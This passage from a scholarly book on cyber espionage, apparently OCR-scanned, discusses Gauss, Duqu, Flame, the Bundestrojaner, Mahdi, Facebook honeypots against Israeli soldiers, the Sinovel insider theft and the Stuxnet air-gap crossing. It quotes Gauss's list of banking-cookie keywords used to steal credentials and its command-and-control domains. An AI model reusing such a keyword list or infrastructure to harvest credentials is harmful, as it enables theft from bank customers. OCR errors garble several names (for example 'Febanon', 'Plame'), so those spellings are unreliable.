this spying software had a modular design. Its designers gave the dif¬ 
ferent modules the names of famous mathematicians, notably Kurt 
Godel, Joseph-Louis Lagrange, and Johann Carl Friedrich Gauss. The 
last module contained the exfiltration capability and was thus the most 
significant. The Russian geeks at Kaspersky therefore called their new 
catch Gauss. 

The software’s lifecycle may approximate one year. Kaspersky Lab 
initially discovered the new malware in the context of a large investiga¬ 
tion initiated by the Geneva-based International Telecommunication 
Union. Gauss was likely written in mid-2011. Its operational deploy¬ 
ment probably started in August and September of that year, just when 
FFungarian anti-virus researchers discovered Duqu, another tool for 
computer espionage probably created by the same entity that also desi¬ 
gned Gauss. The command-and-control infrastructure that serviced the 
spying operation was shut down in July 2012. 

Three of Gauss’s features stand out. The first is that the espionage 
toolkit specialized in financial institutions, especially ones based in 
Lebanon. The Gauss code, which came in the file winshell.ocx, contai¬ 
ned direct commands that were required to intercept data from specific 
banks in Lebanon, including the Bank of Beirut, Byblos Bank, and 
Fransabank. 35 Gauss attempted to find the login credentials for these 
institutions by searching the cookies directory, retrieving all cookie files, 
and carefully documenting the results in its logs. It specifically searched 
for cookies that contained any of the following identifiers: 

paypal; mastercard; eurocard; visa; americanexpress; bankofbeirut; eblf; 

blombank; byblosbank; citibank fransabank; yahoo; creditlibanais; ama¬ 
zon; facebook; gmail; hotmail; ebay; maktoob 

These identifiers denoted global Internet companies with many users 
in Lebanon, including banks with significant operations in the country, 
such as Citibank, or purely Lebanese banks such as Banque Libano- 
Francaisc, BLOM Bank, Credit Libanais, Fransabank, and Byblos Bank, 
as well as some Lebanese-founded institutions with international 
outreach. “This is the first publicly known nation-state sponsored ban¬ 
king Trojan,” Kaspersky Lab concluded in their highly detailed 48-page 
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report on Gauss. Gauss’s geographical reach was notable but limited. 
Kaspersky discovered more than 2,500 infections among its customers, 
which means the overall number could be in the tens of thousands. That 
would be significantly lower than many ordinary malware infections, 
but much higher than the number of infections in the case of the highly 
targeted Duqu, Plame, and Wiper attacks. The vast majority of victims, 
more than 66 per cent, were found in Lebanon, almost 20 per cent in 
Israel, and about 13 per cent in the Palestinian Territories. 

The second notable feature was its carrying load. The software used 
the Round Robin Domain Name Service, a technique used to handle 
large data loads. A Round Robin-capable name server would respond to 
multiple requests by handing out not the same host address, but a rota¬ 
ting list of different host addresses, thus avoiding congestion. Gauss’s 
command-and-control infrastructure, therefore, was designed to handle 
a massive load of data sent back from its virtual spies. The authors of 
Gauss invested a lot of work into that structure, including several servers 
at the following addresses: 

*.gowin7.com 

*.secuurity.net 

*. datajunction.org 

*.bestcomputeradvisor.com 

*.dotnetadvisor.info 

*.guest-access.net 36 

These addresses were registered under fake identities, Jason-Bourne- 
style. Examples are: Peter Kulmann, Antala Straska, Prague (in reality a 
pharmacy); Gilles Renaud, Neugasse 10, Zurich (a nondescript five- 
storey apartment building); and Adolph Dybevek, Prinsens gate 6, Oslo 
(a small hotel). 

The third notable feature was Gauss’s mystery-features. The malware’s 
main payload module, named Godel, had a seemingly exceptionally 
strong encryption. Kaspersky Lab was unable to crack the code and took 
the unusual step of crowdsourcing the task, “If you are a world class 
cryptographer or if you can help us with decrypting them, please contact 
us,” the computer scientists wrote. Another mysterious feature is a 
seemingly superfluous unique custom font, “Palida Narrow.” The 
purpose of this font is unknown. One remote possibility is that the font 
could serve as some form of marker for a potential target. 
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Gauss, in sum, has the look and feel of a state-sponsored attack. Seve¬ 
ral arguments back up this assumption. One is that Kaspersky discove¬ 
red the virus when it was looking for commonalities that the software 
shared with Flame. The researchers found a similar architecture, similar 
module compositions, similar code bases, similar means of communica¬ 
tion with command-and-control servers, and the exploitation of a spe¬ 
cific vulnerability, the so-called .LNK vulnerability, which was already 
used in Stuxnet and Flame. One of Gauss’s modules contains a path c:\ 
documents and settings\flamer\desktop\gauss_ white_l, where the “fla¬ 
mer” stands for the Windows username that created the product. 37 
Taking all these clues together, it indeed looks as if “Gauss was created 
by the same ‘factory’ which produced Flame,” as Kaspersky concluded 
their analysis. 38 A second reason is the software’s sophistication and pro¬ 
fessional execution. And finally, and most convincingly, the target set 
indicates a state-sponsor. Febanon is home to Flezbollah, an organiza¬ 
tion that is politically, criminally, and militarily a major player in the 
region—and, since 1999, on the US State Department’s list of Foreign 
Terrorist Organizations. The US administration has long been concer¬ 
ned about Hezbollah money-laundering through Febanon’s legitimate 
lenders, but has so far failed to produce evidence of this. “There are a 
number of articles published in prestigious U.S. newspapers that claim 
that some of our banks are hoarding illegal cash or getting involved in 
terrorist funding,” Makram Sader, the secretary-general of the Associa¬ 
tion of Banks in Febanon was quoted in July 2012, “All these allegations 
were not substantiated by their authors.” 39 Gauss could have been desi¬ 
gned to change this. 

Stuxnet, Duqu, Flame, and Gauss have one other thing in common: 
most likely, some of these complex malwares were clandestinely opera¬ 
ting for years before security researchers in private companies detected 
them. They demonstrate a remarkable failure on the part of the anti¬ 
virus industry. Their failure is visible because their business model is 
developing and publishing products that mitigate such threats. Whether 
the world’s finest signal intelligence agencies—excluding those that 
potentially developed the attack tools—have also failed is more difficult 
to say because spies don’t publish what they know. But it is a fair 
assumption that if McAfee and Symantec miss a threat, the Bundesna- 
chrichtendienst, the DGSE, and GCHQ could do so as well—not to 
speak of smaller, less well-resourced intelligence agencies. Unless, of 
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course, these agencies themselves are the author of an attack. That, 
increasingly, seems to be the case. 

The German government’s first known use of computer espionage is 
the so-called Bundestrojaner. On 8 October 2011, the Chaos Computer 
Club caused a political uproar in Berlin. Germany’s famous hacker club 
broke news by publishing a report that accused the federal government 
of using a backdoor Trojan to spy on criminal suspects inside Germany. 
Bund means federal in German, so the press started referring to the 
malware as Bundestrojaner. The software was able to take screenshots of 
browser windows and Skype, to record VoIP conversations, and even to 
download more functional modules that were yet to be defined. 40 The 
CCC hackers accused the federal government of “state voyeurism” and, 
because the Trojan’s security precautions were allegedly faulty, of enabling 
third parties to abuse the software. In the following days several German 
states admitted using the spyware, although, officials insisted, under 
strict legal limitations. Noteworthy for spyware that was ordered by the 
German government is the home address of the command-and-control 
server: the commercial ISP Web Intellects based in Columbus, Ohio. 41 

On 7 September 2012, closer to Ohio than Berlin, Debora Plunkett, 
director of the information assurance directorate at the US National 
Security Agency, gave a lecture at the Polytechnic Institute of New York 
University. She spoke about defending cyberspace. “We’re starting to see 
nation-state resources and expertise employed in what we would charac¬ 
terize as reckless and disruptive, destructive behaviours.” 42 Plunkett, 
surprisingly, did not speak about the United States and its allies. Nor did 
she mention Stuxnet, Plame, Gauss, or the roof program Olympic 
Games. She spoke about America’s adversaries. It is therefore important 
to face a stark reality: Western countries are leading the charge in cyber 
espionage. Stuxnet, Plame, and the Bundestrojaner are only among the 
best-documented cases. So it should not come as a surprise, as with 
many other Western tactical innovations, that less developed states are 
trying to catch up and develop their cyber espionage capabilities. Non- 
democratic states, naturally, are not limited by the same institutional, 
legal, and ethical constraints as liberal democracies. One case from the 
Middle East is especially curious. 

The case in question is known as “Mahdi.” As mentioned previously, 
2012 proved a busy year for malware analysts, and this was especially the 
case for those with an interest in the Middle East. In July of that year a 


100 


ESPIONAGE 


most curious incident became public. In Islam, the Mahdi is a messiah- 
like figure, a redeemer. Belief in the Mahdi is an especially important 
concept in Shia Islam, where the return of the Twelfth Imam is seen as 
the prophesized coming of the savior. And Iran is a predominantly Shia 
country. The malware’s name comes from its dropper, which also execu¬ 
ted a text file, mahdi.txt. The file would in turn open a Word document 
that contained a particular news article, published by Eli Lake from The 
Daily Beast in November 2011, “Israel’s Secret Iran Attack Plan: Electro¬ 
nic Warfare.” The article described how Israel had developed “multi¬ 
billion dollar electronic weapons” that could be deployed in the event of 
Israel attacking Iran’s nuclear installations. 43 The Mahdi malware was not 
as powerful as other espionage packages that ricocheted through the 
region that year. But it was still remarkable. 

Most remarkable of all were Mahdi’s ornaments and social enginee¬ 
ring, rather than the technology itself. For instance, the kind of social 
engineering the attackers used to trick their victims into opening mali¬ 
cious email attachments. To infiltrate victims specifically located in 
Israel, the Mahdi attackers sent an email that contained a PowerPoint 
presentation, Moses_picl.pps, with text in English as well as Elebrew. 
The attackers had embedded executable code as an “activated content” 
in one of the slides. The presentation started by asking “Would you like 
to see the Moses?” in English and broken Hebrew (receiving such bilin¬ 
gual content is not unusual in Israel, where many immigrants from 
English-speaking countries—“Anglos”—may still be working on their 
Hebrew, hence broken Hebrew is not necessarily suspicious). The text 
was set against a series of tranquil and peaceful nature-themed images of 
snow-capped mountains, forest lakes, and tropical beaches. When the 
presentation had reached the slide with the embedded executable code, 
the text instructed the viewer—who by now may have been day¬ 
dreaming about the next holiday or spiritual experience—to “look at the 
four central points of the next picture | for 30 seconds ... please click 
this file.” The attackers had carefully crafted their text and anticipated 
that Microsoft Office would now display a pop-up window with a yel¬ 
low exclamation mark, annoyingly interrupting the user’s joy with the 
religiously themed album: “You are about to activate an inserted object 
that may contain viruses or otherwise be harmful to your computer. 
Make sure the object is from a trustworthy source. Do you want to 
continue?” Dozens of Israeli users wanted to continue, the attack statis- 
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tics show. Once the malware was installed, it was able to perform a 
number of information-stealing operations: keylogging, screenshot cap¬ 
ture, audio-recording, and data exfiltration. Mahdi included a screens¬ 
hot capture functionality that was triggered by communication through 
Facebook, Gmail, Hotmail, and other popular platforms. Yet technically, 
from a programmer’s point of view, the attack was simple and inele¬ 
gantly designed, “No extended 0-day research efforts, no security resear¬ 
cher commitments or big salaries were required,” commented Kaspersky 
Lab. 44 It seems that the attack continued for eight months. 

As with almost all cases of political malware, attribution was highly 
difficult and incomplete. So far it has not been possible to link Mahdi 
to a specific actor or agency. But because the code was not particularly 
sophisticated, it seems highly plausible that Mahdi was an Iranian ope¬ 
ration: in order to communicate with command-and-control servers, 
some of them in Canada, an Israeli security firm discovered, some of the 
malware’s communication with its handlers contained calendar dates in 
Persian format as well as code with strings in Farsi, the language spoken 
in Iran. 45 Another indicator is Mahdi’s conspicuous list of targets. The 
800 victims included companies that provide critical infrastructure, 
financial firms, and embassies. All targets were geographically located in 
the wider Middle Eastern region, the vast majority in Iran, followed by 
Israel, Afghanistan, Saudi Arabia, and the Emirates—all of these 
countries are either open enemies or regional rivals of Iran (with the 
exception of Afghanistan, which in 2012 still hosted the armed forces of 
many countries Iran considers adversaries). 

Mahdi was certainly not as impressive as high-powered Chinese intru¬ 
sions. But cyber espionage does not necessarily have to be technically 
sophisticated to be successful. Israel offers two interesting cases, this 
time not as a high-skilled attacker switching off air-defenses or stealthily 
sabotaging nuclear enrichment plants—but as a victim of cyber attack. 
This is not despite, but because of its technological prowess. More than 
any other country in the region, the Jewish State is a veritable high-tech 
nation. By 2009, Israel had more companies listed on the tech-oriented 
NASDAQ index in New York than all continental European countries 
combined. 46 Naturally, online social networks grew rapidly in Israel, 
including in the armed forces, with Facebook proving to be especially 
popular. In early 2011, the country’s Facebook penetration had grown 
to nearly 50 per cent of Israel’s overall population. Israel was one of the 
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most connected countries on the social network, with 71 per cent of all 
users being under the age of thirty-five. 47 This created a novel espionage 
opportunity for Israel’s enemies and it was only a question of time until 
they would try to exploit this public, or at least semi-public, trove of 
information. Indeed, Elezbollah soon started collecting intelligence on 
online social networks. Military officers had long been wary of operatio¬ 
nal security; many were especially concerned about the spotty risk awa¬ 
reness of draftees and young recruits. The IDF, somewhat surprisingly, 
was slow in including Facebook sensibilization in its basic training. 
Israeli officers had good reason to be concerned. Already in September 
2008, Israeli intelligence allegedly warned of Facebook-related enemy 
infiltrations: “Facebook is a major resource for terrorists, seeking to 
gather information on soldiers and IDF units,” a report in the Lebanese 
news outlet Ya Libnan said, “the fear is soldiers might even unknowingly 
arrange to meet an internet companion who in reality is a terrorist.” 48 
Around that time, Elezbollah was probably already testing the waters 
and starting to infiltrate the Israeli Army via Facebook. One operation 
became public in May 2010, more than a year after it had been 
launched. Reut Zukerman was the cover name of a fake Facebook per¬ 
sona allegedly created by Hezbollah operatives. The girl’s profile photo 
showed her lying on a sofa, smiling innocently. Hackers call unautho¬ 
rized attempts to introduce networks through decision “honeypots,” 
although usually the method is not used in the context of social 
networks. In Zukerman’s case the honeypot was an attractive young 
woman, but not too salacious to be suspicious or lacking in credibility. 
Approximately 200 elite soldiers and reservists responded to Zukerman’s 
friendship requests over the course of several months. Once the profile 
had accumulated a visible group of contacts on Facebook, newcomers 
assumed that Reut would be just another Special Forces soldier herself. 
“Zukerman” allegedly succeeded in gaining the trust of several soldiers 
who volunteered information about the names of other service person¬ 
nel, along with explanations of jargon, detailed descriptions of military 
bases, and even codes. Only after one full year did one of Zukerman’s 
“friends” become suspicious and alert the IDF’s responsible unit. 49 

In July 2010, one of the Israel Defense Force’s most serious security 
breaches became known. Soldiers serving at one of the country’s most 
highly classified military bases opened a Facebook group. Veterans of the 
base could upload photos and videos of their shared time in the IDF. 
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The group boasted a motto, in Hebrew, “There are things hidden from 
us, which we will never know or understand.” The group had grown to 
265 members, all approved by an administrator. But the administrators 
apparently did a sloppy job. A journalist from the Israeli daily Yedioth 
Aharonot got access to the group, did some research, and wrote a story. 
“Guys, we were privileged to get to be in this fantastic place,” one vete¬ 
ran wrote, “Keep in touch and protect the secret.” 50 The group members 
posted pictures of themselves on the base. Yet, according to Yedioth, the 
material made available by the group did not contain any compromising 
information. Some of the group’s members had repeatedly warned on 
the page’s wall not to upload classified or sensitive information. 

One feature that appears as a common trait in almost all high-profile 
cyber espionage cases is the use of some form of social engineering, or 
spear-phishing. The use of emails or websites that trick users into unwit¬ 
tingly installing malware highlights the human dimension of cyber 
espionage. This human dimension is more important, at closer exami¬ 
nation, than commonly assumed. Two of the most high-profile examples 
on record illustrate this significance of human sources for computer 
espionage: the first is a Chinese operation, the second an American one. 

A recent row between an American and a Chinese maker of wind 
turbines is instructive. AMSC, an American green energy company for¬ 
merly known as American Superconductor Corp., based in Devens, 
Massachusetts, sought $1.2bn in damages, thus making the case the 
largest intellectual property dispute between the US and China on 
record. Sinovel, China’s biggest manufacturer of such turbines, is known 
for building the country’s first offshore wind farm. Sinovel used to be 
the AMSC’s largest customer, accounting for about 70 per cent of the 
American company’s revenue. But on 5 April, the US company infor¬ 
med its shareholders that Sinovel was refusing delivery of its products 
and had cancelled contracts during the previous month. 51 “We first 
thought that this was an inventory issue, and we were understanding,” 
Jason Eredette, AMSC’s vice president of communications and marke¬ 
ting told IEEE Spectrum. “Then in June we discovered this IP theft, and 
that changed things quite a bit.” 52 The coveted design that the Chinese 
company was after was a new software package that enabled so-called 
“low-voltage ride through,” a way of allowing the wind turbines to 
maintain operations during a grid outage. AMSC reportedly gave Sino¬ 
vel a sample for testing purposes, but the brand-new software had an 
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expiry date, just as some commercial software suites for users require a 
purchase after thirty days or so. So when an employee in China discove¬ 
red a turbine operating with “cracked” software beyond its expiry date, 
AMSC became suspicious. Somebody from inside the firm must have 
helped the Chinese to remove the expiry date, the company reckoned. 
The Massachusetts-based firm started an investigation. Only a limited 
number of AMSC’s employees had access to the “low-voltage ride 
through” software in question, and even fewer people had traveled to 
China. The firm quickly identified one of its staff based in Austria, 
Dejan Karabasevic. At the time of the leak this 38-year-old Serbian was 
working as a manager at a Klagenfurt-based subsidiary of American 
Superconductor, Windtec Solutions. The suspect confessed while 
waiting for his trial in an Austrian prison. On 23 September, the engi¬ 
neer was sentenced to one year in jail and two years of probation. The 
Klagenfurt district court also ordered Karabasevic to pay $270,000 in 
damages to his former American employer. As it turned out during the 
trial, Karabasevic had used a thumb drive to exfiltrate “large amounts of 
data” from his work laptop at Windtec in April 2011, the Austrian judge 
Christian Leibheuser-Karl reported, including the entire source code of 
a crucial program in the most recent version. He then allegedly sent the 
relevant code via his Gmail account to his sources in Sinovel. This source 
code enabled the Chinese company to modify the control and supervi¬ 
sory program. Thanks to the rogue engineer’s help, the Chinese were 
able to copy and modify the software at will, thus circumventing the 
purchase of new software versions as well as new licences. The Austrian 
prosecutors estimated that Karabasevic had received €15,000 from Sino¬ 
vel for his services. 53 Florian Kremslehner, an Austrian lawyer represen¬ 
ting American Superconductor, revealed that his client had evidence 
that Sinovel had lured its valuable spy by offering him an apartment, a 
five-year contract that would have doubled his AMSC salary, and “all 
the human contact” he desired, the attorney said, “in particular, female 
co-workers.” 54 The affair was economically highly damaging for Ameri¬ 
can Superconductor. The company’s yearly revenue dropped by almost 
90 per cent; its stock plunged from $40 to $4; it cut 30 per cent of its 
workforce, around 150 jobs; and it reported a net loss of $37.7 million 
in the first quarter after the Sinovel affair. 55 

A second instructive example is offered by the lead-up phase to Ope¬ 
ration Olympic Games. Even the Stuxnet saga, the only potent cyber 
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weapon ever deployed, demonstrates the continued significance of 
human agents in getting coveted, actionable intelligence. The “holy 
grail,” in the words of one of the attack’s architects, was getting a piece 
of espionage software into the control system at Natanz. The designers 
of what was to become the Stuxnet worm needed fine-grained data from 
inside the Iranian plant to develop their weaponized code. 56 The pro¬ 
blem was that the control system was air gapped, as it should be. But the 
American intelligence operatives had a list of people who were physically 
visiting the plant to work on its computer equipment, therefore trave¬ 
ling across the air gap. The list included scientists as well as maintenance 
engineers. Anybody could carry the payload into the targeted plant, even 
without knowing it. “We had to find an unwitting person on the Iranian 
side of the house who could jump the gap,” one planner later told San¬ 
ger. 57 The list of possible carriers involved Siemens engineers, who were 
helping their Iranian colleagues in maintaining the programmable logic 
controllers. The work of engineers would often involve updating or 
modifying bits of the program that ran on the programmable logic 
controllers, but because the controllers don’t have a keyboard and screen, 
the work had to be done on the engineers’ laptops. And the laptops 
needed to be connected directly to the PLCs to modify their software. 
Siemens was reportedly helping the Iranians to maintain their systems 
every few weeks. Siemens, it should be noted, had been dealing with 
Iran for nearly one-and-a-half centuries. In 1859, the company’s founder 
Werner von Siemens emphasized the importance of business in Iran in 
a letter to his brother Carl in Saint Petersburg. In 1870 Siemens com¬ 
pleted the construction of the 11,000-kilometer Indo-European tele¬ 
graph line, linking London to Calcutta via Tehran. 58 Some 140 years 
later, Siemens engineers were again carrying a novel piece of IT equip¬ 
ment into Iran, but this time without their knowledge: “Siemens had no 
idea they were a carrier,” one US official told Sanger. “It turns out there 
is always an idiot around who doesn’t think much about the thumb 
drive in their hand.” 59 American intelligence agencies apparently did not 
infiltrate Siemens, as they sought to avoid damaging their relationship 
with Germany’s Bundesnachrichtendienst, the country’s foreign intelli¬ 
gence service. But Israel was allegedly not held back by such considera¬ 
tions. Another version of events is that Siemens engineers willingly 
helped infiltrate the malware into Natanz. One recent book on the his¬ 
tory of the Mossad, Spies Against Armageddon, claims that the Bundes- 
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nachrichtendienst, an agency traditionally friendly to Israel out of a 
habit of trying to right past wrongs against the Jewish people during the 
Elolocaust, “arranged the cooperation of Siemens.” 60 Executives at Sie¬ 
mens may have “felt pangs of conscience,” the Israeli-American authors 
suspected, or they may have simply reacted to public pressure. Ultima¬ 
tely the Iranians became suspicious of the German engineers and ended 
the visits to Natanz. 61 But by then it was too late. 

The precise details of Stuxnet’s penetration technique remain 
shrouded in mystery. Yet some details and facts have been established. 
We may not know who ultimately bridged the air gap and made sure the 
worm could start its harmful work. But it now seems highly likely that 
a human carrier helped jump that gap, at least at some stage during the 
reconnaissance or the attack itself. An earlier assumption was that 
Stuxnet had a highly aggressive initial infection strategy hardwired into 
its software, in order to maximize the likelihood of spreading to one of 
the laptops used to program the Siemens PLCs. 62 It should be noted that 
the two possibilities do not necessarily stand in contradiction, as the 
attack was a protracted campaign that had to jump the air gap more 
than once. 

The evolution of the Internet is widely seen as a game-changer for 
intelligence agencies. Appropriate historical comparisons are difficult to 
make. 63 But in terms of significance, the Internet probably surpasses the 
invention of electrical telegraphy in the 1830s. The net’s wider impor¬ 
tance for human communication may be comparable to Johannes 
Gutenberg’s invention of the printing press in the 1440s, a time that 
predates the existence of the modern state with its specialized intelli¬ 
gence agencies. The more precise meaning of this possibly game-chan¬ 
ging development will remain uncertain for years to come. Isolating 
three trends may help clarify the picture. 

The first unprecedented change is an explosion of data. Individuals, 
companies, non-commercial groups, and of course states produce a fast¬ 
growing volume of data in the form of digital imagery, videos, voice 
data, emails, instant messages, text, metadata, and much more besides. 
The digital footprint of almost any individual in a developed country is 
constantly getting deeper and bigger, and so are the digital fingerprints 
that all sorts of transactions are leaving behind in log-files and metadata. 
The same applies to companies and public administrations. More data 
is produced at any given moment than at any time in the past. Vast 
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quantities of this information are instantly classified. Yet, perhaps coun¬ 
terintuitively, the ratio of information that is actually secret is shrinking 
and becoming better protected, argues Nigel Inkster, a former British 
intelligence official now working at the International Institute for Stra¬ 
tegic Studies. 64 Non-classified data is growing faster than classified data. 
The ongoing rise of social media epitomizes this trend: social media 
generate gigantic amounts of data; this data is half-public, depending on 
the privacy settings, thus creating potentially collectable intelligence. 

The second novel change is the rise of the attribution problem. Acts 
of espionage and even acts of political violence that cannot be attributed 
to a perpetrator are of course not new, but their number and significance 
certainly is. In September 2010, Jonathan Evans, the director-general of 
MI5, Britain’s domestic intelligence service, gave a speech to the 
Worshipful Company of Security Professionals, a younger livery com¬ 
pany (an old institution related to medieval guilds), in London. Evans 
highlighted the emerging risks: “Using cyberspace, especially the Inter¬ 
net, as a vector for espionage has lowered the barriers to entry and has 
also made attribution of attacks more difficult, reducing the political 
risks of spying,” he said. 65 More actors were spying, it was easier to hide 
for them, and the risk they were taking was lower. As a result of falling 
costs and rising opportunities, he argued, the likelihood that a firm or 
government agency is the target of state espionage was higher than ever 
before. The range and volume of espionage that can be accomplished 
without attribution has probably never been so great. The same applies 
to the amount of goods that can be [pilfered clandestinely]. 

The third trend partly follows from the first two: the blending of 
economic and political espionage. In late 2007, Evans sent a confidential 
letter to the top executives of 300 large companies in the United 
Kingdom, including banks, financial services firms, accountants, and 
law firms. Evans warned that they were under attack from “Chinese state 
organizations.” 66 This was the first time that the British government had 
directly accused the Chinese government of cyber espionage. The sum¬ 
mary of the letter on the website of the UK’s Centre for the Protection 
of the National Infrastructure warned that the People’s Liberation Army 
would target British firms doing business with China in an effort to steal 
confidential information that may be commercially valuable. The 
foreign intruders had specifically targeted Shell Oil and Rolls Royce, a 
leading producer of high-tech engineered jet engines. Evans’s letter alle- 
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gedly included a list of known “signatures” that could be used to identify 
Chinese Trojans, as well as a rundown of URLs that had been used in 
the past to stage targeted attacks. Economic espionage is more than just 
a subset of this problem. Especially in highly developed knowledge 
societies—the West, in short—the most profitable and the biggest com¬ 
panies have integrated global supply chains with many exposures to the 
Internet. One agency in Washington is in charge of integrating the 
defense against foreign spies across various government agencies, the 
Office of the National Counterintelligence Executive, abbreviated as 
NCIX. In October 2011, the outfit published a report on foreign spying 
operations against US economic secrets in cyberspace. “Cyber tools have 
enhanced the economic espionage threat,” the report states, “and the 
Intelligence Community judges the use of such tools is already a larger 
threat than more traditional espionage methods.” 67 The report clearly 
stated that Chinese actors were the world’s most active and persistent 
aggressors, noting an “onslaught” of computer intrusions against the 
private sector—yet even the intelligence agency in charge of detecting 
such intrusions noted that it was unable to confirm who within China 
was responsible. 

These trends create a number of novel challenges for intelligence 
agencies, especially those agencies or subdivisions traditionally focused 
on signal intelligence, SIGINT. The first challenge is selection: iden¬ 
tifying and exploiting the most relevant sources for the most relevant 
information. This challenge is a consequence of big data. The problem 
is best illustrated by modifying the old quip of the drunk looking for the 
car keys underneath the streetlight, because that’s where the light is. Big 
data means the drunk is now searching for the car keys in a sprawling 
and brightly lit field of streetlights, stretching out in all directions as far 
as the eye can see. Finding the keys there is a problem in itself. But the 
selection problem is that the key may still be in the dark, beyond that field 
of streetlights. Just because a signal intelligence agency has a lot of data, 
this doesn’t necessarily mean it has the right data. 

The second challenge is interpretation and analysis (i.e. finding the 
keys within that field of streetlights). Big data means that turning data 
into intelligence has become harder, and turning that intelligence into 
“actionable” intelligence even more so. Pure cyber espionage—that is, 
remote infiltration of a system, remote reconnaissance, and remote exfil¬ 
tration of data—comes with a number of problems built in. A lack of 


109 


CYBER WAR WILL NOT TAKE PLACE 


insider knowledge almost always means that putting data and informa¬ 
tion into context is far harder. The story of Tanaka’s head baker epito¬ 
mizes this problem. If a company is set to steal and replicate an entire 
industrial process, a lot of tacit knowledge is required to replicate that 
process, not just explicit knowledge stored in data. Data can be down¬ 
loaded, but not experience and skills and hunches, all of which are 
crucial in order to understand complex processes as well as complex 
decisions. Access to insiders may be necessary to put a deluge of infor¬ 
mation into context. Big data, in short, also means that intelligence 
agencies can collect far more data than they can sensibly analyze. 

The third challenge is reorienting and reconnecting human intelli¬ 
gence. The specter of cyber espionage, especially from the point of view 
of the attacked, is threatening to drive a wedge between SIGINT and 
HUMINT, with the former receiving lots of funds, even in times of 
scarce budgets, and the latter receiving queries about its continued rele¬ 
vance. “[Hjuman spies are no longer the whole game,” observed Bren¬ 
ner, formerly at the NSA, “If someone can steal secrets electronically 
from your office from Shanghai or Moscow, perhaps they don’t need a 
human spy.” 68 Yet seeing a cleavage between the two forms of intelli¬ 
gence would be mistaken. Stuxnet and the Sinovel case, two of the most 
high-profile cyber espionage operations, highlight the crucial relevance 
of human operatives within cyber espionage operations. As Evans noted 
to the Worshipful Company of Security Professionals, “Cyber espionage 
can be facilitated by, and facilitate, traditional human spying.” 69 The two 
prime challenges induced by the explosion of data and the attribution 
problem—selection and interpretation—may be dealt with only 
through old-fashioned E1UMINT work, albeit sometimes technically 
upgraded, and not merely by “pure” cyber espionage and data- 
crunching. One crucial job of intelligence agents is to recruit and main¬ 
tain a relationship of trust with informants, for instance Iranian 
scientists working on the nuclear enrichment program clandestinely 
passing on information to the CIA. The recruitment and maintenance 
of informants is a delicate task that requires granular knowledge of an 
individual’s personality and history, and establishing a personal rela¬ 
tionship between the handler and the informant. It has become possible 
to establish and maintain such relationships online, although such 
online-only recruitment presents significant challenges to intelligence 
agencies. Making sure that a person on Skype, Facebook, or email is a 
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bona fide member of a specific group or profession is more difficult than 
in a face-to-face conversation and interrogation. 70 Human intelligence 
is still needed, and tacit knowledge makes it clear why this is the case. 
Neither the value of tacit knowledge nor the value of personal trust and 
face-to-face connections has diminished in the twenty-first century. 

The fourth challenge for secretive intelligence agencies is openness: 
not openly available data, but the need to be open and transparent to 
succeed. On 12 October 2010, the head of the Government Commu¬ 
nications Headquarters (GCHQ), the UK’s equivalent to the National 
Security Agency, gave a noteworthy speech. The speech by Iain Lobban 
was noteworthy for the fact alone that it was the first-ever major address 
by an acting head of the secretive agency, known as the “doughnut” in 
England because of its ring-shaped headquarters building near Chelten¬ 
ham, a large spa town in Gloucestershire, two hours west of London. 
Lobban indeed made a few important points in the speech. Perhaps the 
most crucial one was that he highlighted an opportunity that the United 
Kingdom could seize if only the government, telecommunication com¬ 
panies, hardware and software vendors, as well as service providers, 
would “come together:” 

It’s an opportunity to develop a holistic approach to Cyber Security that 
makes UK networks intrinsically resilient in the face of cyber threats. 
And that will lead to a competitive advantage for the UK. We can give 
enterprises the confidence that by basing themselves here they gain the 
advantages of access to a modern Internet infrastructure while reducing 
their risks . 71 

It is no longer enough that the government’s own networks are safe. 
Securing a country’s interest in cyberspace requires securing a segment 
of the entire domain that goes far beyond just the public sector within 
it. But such a holistic approach to cyber security, and the intelligence 
agency-private sector cooperation needed for that approach, comes with 
built-in difficulties. Giving enterprises confidence before they even come 
to the UK implies some form of international marketing to highlight 
the security benefits of Britain as a new home for financial firms and 
high-tech entrepreneurs. But GCHQ was formed in 1919 as the 
Government Code and Cypher School and is known for inventing 
public key cryptography, a tool to keep information secret. This long- 
fostered secretive culture may now turn from virtue to vice. Only by 
being significantly and aggressively more open will intelligence agencies 


111 


CYBER WAR WILL NOT TAKE PLACE 


be able to meet their new responsibilities, especially those concerning 
the economic dimension of that responsibility. 

This fourth challenge leads to a fifth one that is even more fundamen¬ 
tal. The Internet made it far more difficult to draw the line between 
domestic and foreign intelligence. The predominant administrative 
division of labor in the intelligence community is predicated on a clear 
line between internal and external affairs, as is the legal foundation of 
espionage. That line, which was never entirely clear, has become brittle 
and murky. The attribution problem means that an agency that inter¬ 
cepts an email of grave concern, for instance, may find it impossible to 
locate the sender and the receiver, therefore making it impossible to 
identify a specific piece of intelligence as foreign or domestic. But the 
intelligence may still be highly valuable. In 1978, US President Jimmy 
Carter signed the so-called Foreign Intelligence Surveillance Act (FISA) 
into law. Introduced by Senator Ted Kennedy, the act was designed to 
improve congressional oversight of the government’s surveillance activi¬ 
ties. The backdrop of the new law was President Richard Nixon’s abuse 
of federal intelligence agencies to spy on opposition political groups in 
America. FISA, as a consequence, imposed severe limits on the use of 
intelligence agencies inside the United States, including intercepting 
communication between foreigners on American soil. 

In sum, intelligence agencies engaged in some form of cyber espio¬ 
nage are facing down an ugly catch-22: on the one hand, taking cyber 
espionage seriously means unprecedented openness vis-a-vis new consti¬ 
tuencies as well as unprecedented and borderline-legal surveillance at 
home. This means change: changing the culture as well as the adminis¬ 
trative and possibly legal setup of what intelligence agencies used to be 
in the past. Such reforms could amount to a veritable redefinition of the 
very role of intelligence agencies. On the other hand, taking cyber espio¬ 
nage seriously means reintroducing and strengthening the human ele¬ 
ment, in order to penetrate hard targets, big data, and the wicked 
attribution problem. But by recruiting, placing, and maintaining human 
intelligence sources, an agency may effectively move an operation outside 
the realm of cyber espionage narrowly defined, thus removing the 
“cyber” prefix from espionage. 
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The previous chapters discussed two general types of cyber attack, 
namely sabotage and espionage. The third remaining offensive activity 
is subversion. Subversion was one of the most complex and intellectually 
challenging political phenomena long before the arrival of modern tele¬ 
communication. But the Internet and the commoditization of telecom¬ 
munication are changing the nature of subversion, making it even more 
complex. As a consequence, this chapter, more than the two previous 
chapters, is only able to scratch the surface of a much deeper subject. 
Remarkably, that subject has received comparatively little recent scho¬ 
larly attention. But by focusing on subversion, and not on insurgency or 
terrorism, the following paragraphs open fresh perspectives on past 
examples that help to understand the likely lifespan and endurance of 
resistance movements in a networked present and an even more net¬ 
worked future. 

The first dozen years of the twenty-first century have seen an explo¬ 
sion in protest and political violence. The most extreme and cataclysmic 
